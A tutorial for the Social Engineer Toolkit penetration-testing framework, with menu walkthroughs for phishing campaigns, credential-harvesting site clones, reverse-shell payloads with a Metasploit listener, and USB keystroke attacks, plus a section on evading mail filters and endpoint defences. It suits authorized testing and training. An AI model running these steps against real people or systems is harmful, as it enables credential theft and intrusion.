Social Engineer Toolkit (SET)
The Social Engineer Toolkit (SET) is an open-source penetration testing framework for social engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a range of social engineering attacks and gives assessors a single menu-driven platform for testing the human side of an organisation's security.
Installation and setup
Installation on Kali Linux
```bash
# SET comes pre-installed on Kali Linux
setoolkit

# Update SET: the Kali package lives under /usr/share/set and is updated with apt,
# so "git pull" only applies to a manual clone (adjust the path to wherever you cloned it)
cd /opt/set && git pull
```
Manual installation
```bash
# Clone the repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install the Python dependencies
pip3 install -r requirements.txt

# Run the installer
python3 setup.py install

# Launch SET (directly from the clone, or with "setoolkit" once installed)
python3 setoolkit
```
Configuration
```bash
# Edit the configuration file
nano /etc/setoolkit/set.config

# Key configuration options (the three ON/OFF flags default to OFF):
WEBATTACK_EMAIL=ON                               # use email delivery together with the web attack vectors
APACHE_SERVER=ON                                 # serve cloned pages from Apache instead of SET's built-in web server (set APACHE_DIRECTORY as well)
METASPLOIT_PATH=/usr/share/metasploit-framework  # where SET looks for msfconsole and msfvenom
SENDMAIL=ON                                      # send through a local sendmail/postfix, which allows a spoofed From: address
EMAIL_PROVIDER=GMAIL                             # provider account used by the mass mailer when SENDMAIL is OFF
```
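As an added example (not part of SET or of this page's original content), the bash helper below changes set.config options without opening an editor, so the tweaks above can be scripted and repeated on a fresh box. It assumes the file uses one KEY=VALUE per line with `#` comment lines, as /etc/setoolkit/set.config does; the file it edits in the demo is a constructed sample, not the real config.

```bash
#!/usr/bin/env bash
# Added example, not part of SET: script edits to a set.config-style file.
# Assumes one KEY=VALUE per line and '#' comment lines, like /etc/setoolkit/set.config.
set -eu

# set_config_option FILE KEY VALUE
# Rewrites the first active (uncommented) KEY= line in place, or appends KEY=VALUE
# if the key is not present. Running it twice with the same arguments is a no-op.
set_config_option() {
  local file="$1" key="$2" value="$3"
  if grep -qE "^${key}=" "$file"; then
    sed -i -E "s|^${key}=.*|${key}=${value}|" "$file"
  else
    printf '%s=%s\n' "$key" "$value" >> "$file"
  fi
}

# get_config_option FILE KEY
# Prints the value of the first active KEY= line (commented-out examples are ignored).
get_config_option() {
  local file="$1" key="$2"
  sed -nE "s/^${key}=(.*)$/\1/p" "$file" | head -n 1
}

# make_sample_config
# Writes a constructed sample (NOT the real set.config) to a temp file and prints its path.
make_sample_config() {
  local f
  f="$(mktemp)"
  cat > "$f" <<'EOF'
### constructed sample config for demonstration
# METASPLOIT_PATH=/opt/metasploit-framework    (commented example, must stay untouched)
METASPLOIT_PATH=/usr/share/metasploit-framework
SENDMAIL=OFF
APACHE_SERVER=OFF
EOF
  printf '%s\n' "$f"
}

# Demo: enable sendmail spoofing and select Gmail as provider, then show the result.
if [ "${1:-}" = "--demo" ]; then
  cfg="$(make_sample_config)"
  set_config_option "$cfg" SENDMAIL ON
  set_config_option "$cfg" EMAIL_PROVIDER GMAIL
  cat "$cfg"
  rm -f "$cfg"
fi
```

Run it with `--demo` to see the edited sample; against the real file call `set_config_option /etc/setoolkit/set.config SENDMAIL ON` as root. Matching only lines that start with the key is what keeps the commented-out examples in the stock config intact.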
Main menu options
1) Social-Engineering Attacks
```bash
# Launch SET
setoolkit

# Select option 1 from the main menu
# Social-Engineering Attacks submenu:
#   1) Spear-Phishing Attack Vectors
#   2) Website Attack Vectors
#   3) Infectious Media Generator
#   4) Create a Payload and Listener
#   5) Mass Mailer Attack
#   6) Arduino-Based Attack Vector
#   7) Wireless Access Point Attack Vector
#   8) QRCode Generator Attack Vector
#   9) Powershell Attack Vectors
#  10) Third Party Modules
```
Spear-phishing attack vectors
```bash
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
#   1) Perform a Mass Email Attack
#   2) Create a FileFormat Payload
#   3) Create a Social-Engineering Template
```
Mass Email Attack
- Configure SMTP settings (a Gmail account or your own SMTP server)
- Import a target list or enter a single address
- Create or select an email template
- Attach the generated payload

FileFormat Payload
- Select a file format (PDF, DOC, XLS, etc.)
- Choose the Metasploit file-format exploit to embed
- Generate the malicious file; these modules target old, unpatched readers, so against current Office or Acrobat versions they mostly serve to confirm that attachments get opened

Email templates
- Pre-built templates for common scenarios
- Custom template creation
- HTML email support
Website attack vectors
```bash
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
#   1) Java Applet Attack Method
#   2) Metasploit Browser Exploit Method
#   3) Credential Harvester Attack Method
#   4) Tabnabbing Attack Method
#   5) Web Jacking Attack Method
#   6) Multi-Attack Web Method
#   7) HTA Attack Method
```
Credential Harvester
- Clone a legitimate site (or use a built-in template or a custom HTML import)
- Capture the fields submitted through the cloned form
- Redirect the victim to the real site after capture, so the failed login looks like a typo
- Email the harvested credentials (only if the mail settings in set.config are configured)

Java Applet Attack
- Self-signed Java applet (SET can also use a certificate you supply)
- Social engineering prompt asking the user to run the applet
- Payload execution once the user accepts
- Caveat: current browsers no longer run Java applets at all, so this vector only works against legacy environments with an old browser and Java plug-in

Browser Exploit Method
- Metasploit browser exploits, including Browser Autopwn
- Automatic exploitation when the victim loads the page
- Multiple exploit attempts against the visiting browser
Attack scenarios
Credential harvesting
```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
#   1) Web Templates
#   2) Site Cloner
#   3) Custom Import

# Site Cloner example:
#   SET first asks for the IP address the cloned form should post back to (your listening IP)
#   Enter URL to clone: https://gmail.com
# SET clones the page and serves it on port 80 (its own web server, or Apache when APACHE_SERVER=ON),
# so stop anything else bound to port 80 first.
# Pages whose login form is built by JavaScript (Gmail is one) usually clone badly;
# a web template or a custom import of a static HTML page is more reliable.
# Captured credentials are printed to the terminal and, when the harvester is stopped with Ctrl-C,
# written to a report under /root/.set/reports/
```
Phishing email campaign
```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
#   1) Select the attack vector (file-format payload, etc.)
#   2) Configure the payload (LHOST/LPORT)
#   3) Set up the email template
#   4) Configure SMTP settings (Gmail account or own server)
#   5) Import the target email list
#   6) Send the campaign

# Email list format (emails.txt), one address per line:
user1@company.com
user2@company.com
user3@company.com
```
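Before the target list goes into the mass mailer it is worth normalising it and enforcing the authorised scope mechanically; one stray address sends a phishing mail to someone outside the engagement. The bash script below is an added example, not SET's code and not part of this page's original material: it lowercases and de-duplicates the list, drops malformed lines, and keeps only addresses whose domain appears verbatim in a scope file (subdomains have to be listed explicitly). The addresses and the scope domain are constructed sample data.

```bash
#!/usr/bin/env bash
# Added example, not SET code: sanitise a mass-mailer target list and enforce scope.
# Assumptions: TARGETS has one address per line ('#' lines are comments);
# SCOPE has one authorised domain per line, matched exactly (list subdomains explicitly).
set -eu

# classify_targets TARGETS SCOPE MODE
#   MODE=in  -> lowercased, de-duplicated addresses whose domain is authorised (feed these to SET)
#   MODE=out -> well-formed addresses whose domain is NOT authorised (review before sending anything)
# Lines that are not syntactically an address are dropped in both modes.
classify_targets() {
  local targets="$1" scope="$2" mode="$3"
  awk -v scopefile="$scope" -v mode="$mode" '
    BEGIN {
      while ((getline d < scopefile) > 0) {
        gsub(/[[:space:]]/, "", d)
        if (d != "") ok[tolower(d)] = 1
      }
    }
    {
      line = tolower($0)
      gsub(/^[[:space:]]+|[[:space:]]+$/, "", line)
      if (line == "" || line ~ /^#/) next
      if (line !~ /^[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]+$/) next   # malformed, drop
      if (seen[line]++) next                                     # duplicate after lowercasing
      split(line, p, "@")
      authorised = (p[2] in ok)
      if ((mode == "in" && authorised) || (mode == "out" && !authorised)) print line
    }' "$targets"
}

# make_sample_targets / make_sample_scope
# Write constructed sample data (fictional addresses on RFC 2606 domains) and print the file path.
make_sample_targets() {
  local f
  f="$(mktemp)"
  cat > "$f" <<'EOF'
# constructed sample target list
Alice.Smith@Example.com
bob@example.com
alice.smith@example.com
carol@partner.example.net
not-an-address
dave@sub.example.com
EOF
  printf '%s\n' "$f"
}

make_sample_scope() {
  local f
  f="$(mktemp)"
  printf 'example.com\n' > "$f"
  printf '%s\n' "$f"
}

# Demo: write the in-scope list to emails.txt for SET and show what was held back.
if [ "${1:-}" = "--demo" ]; then
  t="$(make_sample_targets)"; s="$(make_sample_scope)"
  classify_targets "$t" "$s" in > emails.txt
  echo "in scope ($(wc -l < emails.txt) addresses) written to emails.txt"
  echo "out of scope, not sent:"; classify_targets "$t" "$s" out
  rm -f "$t" "$s"
fi
```

With the sample data only alice.smith@example.com and bob@example.com reach emails.txt; carol@partner.example.net and dave@sub.example.com are reported as out of scope because exact domain matching is deliberate: a partner domain or a subdomain is only in scope if the authorisation says so.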
Infectious Media Generator
```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
#   1) File-Format Exploits
#   2) Standard Metasploit Executable

# File-Format Exploits (Metasploit file-format modules for old, unpatched readers):
#   - PDF exploits
#   - Microsoft Office exploits
#   - browser-based exploits

# Standard Executable:
#   - Windows executable
#   - Linux executable
#   - Mac OS X executable

# SET writes the payload together with an autorun.inf into the "autorun" folder under /root/.set/
# for copying onto a USB stick or DVD. Autorun from removable media has been disabled in Windows
# since Windows 7, so on any current system the victim has to open the file themselves.
```
PowerShell attack vectors
```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
#   1) PowerShell Alphanumeric Shellcode Injector
#   2) PowerShell Reverse Shell
#   3) PowerShell Bind Shell
#   4) PowerShell Dump SAM Database

# Reverse Shell example:
#   Enter the IP address for the reverse connection (LHOST)
#   Enter the port for the reverse connection (LPORT)
#   SET generates the PowerShell one-liner (an encoded "powershell" command), saves it under the
#   reports directory and offers to start the matching listener
#   Run the command on the target system; it connects back to LHOST:LPORT
```
Advanced techniques
Custom payloads
```bash
# Create a custom payload and listener
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options (the exact list depends on the SET version), for example:
#   1) Windows Shell Reverse_TCP
#   2) Windows Meterpreter Reverse_TCP
#   3) Windows Meterpreter Reverse_HTTP
#   4) Windows Meterpreter Reverse_HTTPS
#   5) Linux Shell Reverse_TCP

# Configuration:
#   Set LHOST (the attacker IP the payload connects back to)
#   Set LPORT (listening port)
#   SET generates the payload with msfvenom
#   SET then asks whether to start the matching Metasploit handler
```
Multi-Attack Web Method
```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Lets you enable several web methods on a single cloned page:
#   - Java Applet Attack
#   - Metasploit Browser Exploit
#   - Credential Harvester
#   - Tabnabbing
#   - Web Jacking

# The visiting browser is presented with each enabled method in turn, so if one is
# refused or fails (applet declined, exploit not applicable) the next still gets a chance.
# The price is a noisier page: more prompts and more artefacts for the victim and for defenders to notice.
```
Arduino-based attacks
```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types (as listed on this page; the menu varies by SET version):
#   1) Powershell HTTP GET MSF Payload
#   2) WSCRIPT HTTP GET MSF Payload
#   3) Powershell HTTP POST MSF Payload
#   4) WSCRIPT HTTP POST MSF Payload
#   5) Download-Execute Powershell Attack
#   6) Download-Execute WSCRIPT Attack

# SET generates a sketch for a Teensy/Arduino board that acts as a USB keyboard and types the payload
# Physical access is required: someone has to plug the device into the target
# The keystrokes run automatically once the device is connected
# Because the device enumerates as a HID keyboard, USB mass-storage and autorun restrictions do not apply to it
```
Metasploit integration
Setting up the Metasploit integration
```bash
# Configure the Metasploit path in SET
nano /etc/setoolkit/set.config
# Set the Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start a Metasploit listener manually; payload type, LHOST and LPORT must match what SET generated
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > set ExitOnSession false   # keep the handler up for further callbacks
msf6 exploit(multi/handler) > exploit -j                  # run the handler as a background job
```
Automated listener setup
```bash
# SET can start the Metasploit listener for you
# When creating a payload, SET asks:
#   "Do you want to start the listener now? [y/n]:"
# Answer 'y' for an automatic listener setup

# SET will:
#   1) generate the appropriate payload
#   2) start msfconsole
#   3) configure exploit/multi/handler with the matching payload, LHOST and LPORT
#   4) start the listener
```
Reporting and logging
Harvester reports
```bash
# Location of the harvested credentials
ls -l /root/.set/reports/

# View captured credentials (report names contain the timestamp, so quote the path)
cat "/root/.set/reports/2024-01-01 12:00:00.txt"

# Email reports (only if the mail settings in set.config are configured):
#   automatic email notifications
#   real-time alerts as credentials are captured
```
Attack logs
```bash
# SET log files
ls /root/.set/logs/

# Follow the SET log
tail -f /root/.set/logs/set_logfile.log

# Apache access log (for web attacks served through Apache)
tail -f /var/log/apache2/access.log

# Mail log (sendmail/postfix delivery)
tail -f /var/log/mail.log
```
Report generation
```bash
# Pull specific information out of the log files
grep -i "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses (the regex needs -E; the braces must not be escaped)
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.set/logs/set_logfile.log | sort -u

# Count lines reporting a successful step (only as reliable as the log's own wording)
grep -c "successful" /root/.set/logs/set_logfile.log
```
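The greps above give rough counts; for a harvester engagement the figures that matter are how many distinct clients loaded the cloned page (GET) and how many actually submitted the form (POST), with URL-prefetching mail gateways and link scanners filtered out so they do not inflate the click rate. The script below is an added example, not part of SET or of this page's original material; it assumes Apache's default combined LogFormat and that the clone's form posts back to a path on the same host. The log lines it parses are constructed samples using documentation-range IPs and a fictional scanner user agent.

```bash
#!/usr/bin/env bash
# Added example, not part of SET: turn a harvester's Apache access log into the two numbers
# that matter (who loaded the page, who submitted the form). Assumes the default "combined"
# LogFormat: client IP is field 1, the request method is field 6 (with a leading quote).
set -eu

# visits_and_submits LOG [SKIP_UA_REGEX]
# Prints "IP gets posts" per client, sorted by IP. Lines matching SKIP_UA_REGEX (typically a
# user-agent pattern) are ignored, so link scanners do not count as clicks.
visits_and_submits() {
  awk -v skip="${2:-}" '
    skip != "" && $0 ~ skip { next }
    {
      ip = $1; method = $6; gsub(/"/, "", method)
      seen[ip] = 1
      if (method == "GET")  gets[ip]++
      if (method == "POST") posts[ip]++
    }
    END { for (ip in seen) printf "%s %d %d\n", ip, gets[ip] + 0, posts[ip] + 0 }' "$1" | sort
}

# submitted_ips LOG [SKIP_UA_REGEX]
# Clients with at least one POST, i.e. the ones that actually typed something into the clone.
submitted_ips() {
  visits_and_submits "$1" "${2:-}" | awk '$3 > 0 { print $1 }'
}

# make_sample_log
# Writes constructed log lines (documentation-range IPs, fictional scanner UA) to a temp file.
make_sample_log() {
  local f
  f="$(mktemp)"
  cat > "$f" <<'EOF'
203.0.113.10 - - [01/Jan/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Jan/2024:12:00:09 +0000] "POST /post.php HTTP/1.1" 302 0 "http://10.0.0.5/" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:12:01:15 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:12:01:16 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (compatible; ExampleLinkScanner/1.0)"
203.0.113.10 - - [01/Jan/2024:12:02:00 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
EOF
  printf '%s\n' "$f"
}

# Demo against the constructed log; on an engagement point it at /var/log/apache2/access.log.
if [ "${1:-}" = "--demo" ]; then
  log="$(make_sample_log)"
  echo "ip gets posts (scanner hits excluded):"
  visits_and_submits "$log" 'ExampleLinkScanner'
  echo "submitted credentials: $(submitted_ips "$log" 'ExampleLinkScanner' | wc -l | tr -d ' ') client(s)"
  rm -f "$log"
fi
```

On the sample log the unfiltered view shows three clients, but only two once the scanner line is excluded, and only one of them posted the form. Counting GETs as "clicks" without that filter would overstate the result by a third, which is the kind of error that ends up in an executive summary.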
Evasion techniques
Email delivery evasion
Sender reputation
- Send from a domain and provider with an established reputation; a freshly registered domain scores badly with filters
- Ramp sending up gradually instead of blasting the whole list at once
- Personalise the content per recipient

Headers and authentication
- Publish SPF and DKIM for the sending domain you control; mail that fails DMARC for a domain with a reject policy never reaches the inbox, so simply spoofing the From: of such a domain does not work
- Set Reply-To to an address you control
- Make the message look like part of an existing thread (In-Reply-To/References headers, a "Re:" subject)

Content evasion
- Image-based content instead of text that triggers filters
- URL shorteners or redirectors in front of the phishing URL
- Attachments hosted on legitimate file-hosting services
Web attack evasion
Infrastructure
- Domain fronting (most large CDNs have blocked it since 2018, so check the provider first)
- Put the phishing site behind a CDN
- Serve over HTTPS with a valid certificate; browsers flag plain-HTTP login forms
- Host on reputable providers rather than on the attack box itself

Traffic
- Rotate User-Agent strings and source IPs when probing targets
- Vary request timing
- Send plausible Referer headers

Content delivery
- Staged payloads
- Encrypted command-and-control traffic
- Deliver in file formats the target normally handles
Payload evasion
Encoding and packing
- Encoders
- Encryption of the payload body
- Packing/compression
- Code obfuscation

Delivery
- File formats the target normally handles
- Trusted applications as the launcher
- Signed executables

Execution
- Living off the land (built-in Windows binaries)
- Alternatives to PowerShell where it is logged or blocked
- Memory-only execution that leaves nothing on disk
Best practices
Legal and ethical considerations
- Always obtain written authorization before any campaign
- Document scope and limitations (domains, addresses, dates, excluded people)
- Follow responsible disclosure for anything found along the way
- Maintain confidentiality of the harvested data
```bash
# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```
Operational security
- Use dedicated infrastructure for the engagement
- Log everything you send and capture
- Use secure communication channels with the client
- Back up engagement data regularly

Infrastructure isolation
- Separate testing networks
- Dedicated email accounts
- Isolated web servers

Data protection
- Encrypted storage for harvested credentials and reports
- Secure transmission to the client
- Proper disposal once the engagement is closed
Testing methodology
Reconnaissance phase
- Target identification
- Information gathering
- Attack vector selection

Execution phase
- Payload delivery
- Credential harvesting
- System compromise

Post-exploitation
- Establishing persistence (only where the scope allows it)
- Data collection
- Evidence gathering

Reporting phase
- Impact assessment
- Remediation recommendations
- Executive summary
Troubleshooting
Common issues
Email delivery problems
- Check the SMTP configuration
- Verify DNS settings (MX, SPF, DKIM) for the sending domain
- Test email connectivity to the SMTP server

Web server issues
- Check the Apache configuration
- Verify that port 80 is free (SET's built-in server and Apache cannot both bind it)
- Test web connectivity from the victim's network position

Payload generation errors
- Verify the Metasploit integration (METASPLOIT_PATH)
- Check dependencies
- Update the SET framework

Permission issues
- Run as root
- Check file permissions
- Verify directory access
Configuration fixes
```bash
# Reset the SET configuration: back it up first; if SET does not recreate the file,
# restore the backup or reinstall the package on Kali with "apt install --reinstall set"
cp /etc/setoolkit/set.config /etc/setoolkit/set.config.bak
rm /etc/setoolkit/set.config
setoolkit   # recreates the default config

# Update a git-based SET install
cd /opt/set && git pull && python3 setup.py install

# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2

# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix
```
Resources
- SET official documentation
- TrustedSec Blog
- Social Engineering Framework
- NIST Cybersecurity Framework
- SANS Social Engineering